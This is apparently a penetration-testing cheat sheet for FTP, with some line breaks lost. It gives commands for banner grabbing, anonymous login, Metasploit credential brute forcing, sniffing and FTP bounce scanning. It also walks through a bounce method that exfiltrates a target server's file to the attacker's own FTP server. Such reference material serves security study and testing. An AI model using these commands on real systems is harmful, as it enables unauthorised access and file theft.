The File Transfer Protocol (FTP) is a standard network protocol used for the transfer of files between a client and server. It usually runs on ports 21/tcp or 2121/tcp.
Standard UNIX-like commands, like
rm can be used. Here is a short list of some specific commands.
display local help information
download file from remote server
upload file on the remote server
set the transfer type to "ASCII"
set the transfer type to "Binary"
terminate FTP session
terminate ftp session and exit
Useful to get basic information about the FTP server such as its type and version.
telnet -vn $IP $PORT
FEAT commands could give information about the FTP server such as the recognized commands and the extended features the server supports.
HELP214-The following commands are recognized (* =>'s unimplemented):214-CWD XCWD CDUP XCUP SMNT* QUIT PORT PASV214-EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD214-XRMD MKD XMKD PWD XPWD SIZE SYST HELP214-NOOP FEAT OPTS AUTH CCC* CONF* ENC* MIC*214-PBSZ PROT TYPE STRU MODE RETR STOR STOU214-APPE REST ABOR USER PASS ACCT* REIN* LIST214-NLST STAT SITE MLSD MLST214 Direct comments to [email protected]FEAT211-Features:PROTCCCPBSZAUTH TLSMFF modify;UNIX.group;UNIX.mode;REST STREAMMLST modify*;perm*;size*;type*;unique*;UNIX.group*;UNIX.mode*;UNIX.owner*;UTF8EPRTEPSVLANG en-USMDTMSSCNTVFSMFMTSIZE211 End
Some FTP servers are configured to let users connect anonymously and thus give them access to files on the servers without authentication.
$ ftp $IP $PORTName: anonymousPassword: <nothing>ftp> ls -a # List all files (even hidden) (yes, they could be hidden)ftp> ...
msfconsoleuse auxiliary/scanner/ftp/ftp_loginset RHOSTS $IPset RPORT $PORTset USER_FILE $user.txtset PASS_FILE $pass.txtrun
If the FTP communications are not encrypted and if the attacker is on the same network of the client or the server he can sniff the data packet traveling between the client and the server in order to retrieve credential.
Several tools like
Wireshark could be used to sniff TCP packets.
FTP Bounce attacks let an attacker requests access to ports by using the FTP command
PORT. It's mostly used to make a port-scan without being detected (as you are not the one doing it, but the FTP server for you), for D.o.S. attacks, or to download files from another FTP server.
To check if the FTP server is vulnerable to Bounce attacks it is possible to use the tool
If a FTP server is vulnerable to Bounce attacks, an attacker could use it to scan its network without being detected.
nmap -v -b -P0 'username':'password'@'ftp_server' 'address(es)_to_scan'
If an attacker has access to a bounce FTP server, he can make it request files of other FTP server and download that file to his own server.
Connect to your own FTP server and make the connection passive to make it listen in a directory where the victim service will send the file.
#Start server + connectionservice pure-ftpd startftp My_IP 21ftp> USER my_own_username#Enable passive modeftp> pasvEntering Passive Mode (F,F,F,F,X,X) #Note the output (IP and port)#Tells server to accept data and to store it into the dump fileftp> stor dump
Create the file to send to the intermediate server with the commands that the targeted server will have to execute. Let's call this file
user ftp # user and pass of the targeted serverpass [email protected]cwd /DIRECTORYtype iport F,F,F,F,X,X #IP and port of the attackerretr file.tar.Zquit^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@...
Upload this file on the intermediate server, then upload it from the intermediate server to the targeted server and __make the targeted machine execute this file.
#Run these commands on the intermediate serverput instrsquote "port C,C,C,C,0,21" #IP of the targeted serverquote "retr instrs"
The attacker should have received on his server the file 'file.tar.Z' renamed as 'dump'.